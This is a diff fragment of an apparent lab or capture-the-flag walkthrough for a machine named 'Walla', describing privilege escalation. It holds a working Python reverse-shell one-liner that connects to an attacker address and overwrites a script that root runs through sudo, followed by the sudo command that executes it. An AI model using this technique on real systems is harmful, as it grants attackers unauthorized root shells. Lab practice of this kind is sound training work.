Walla

 Running linpeas.sh on the target reveals the following interesting information:

-As www-data we can delete the file /home/walter/wifi_reset.py and replace it with a Python reverse shell of the same name:
+As www-data we can delete the file /home/walter/wifi\_reset.py and replace it with a Python reverse shell of the same name:

 echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.233",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' > /home/walter/wifi_reset.py

-Then execute with sudo
+Then execute with `sudo` as root:

 sudo /usr/bin/python /home/walter/wifi_reset.py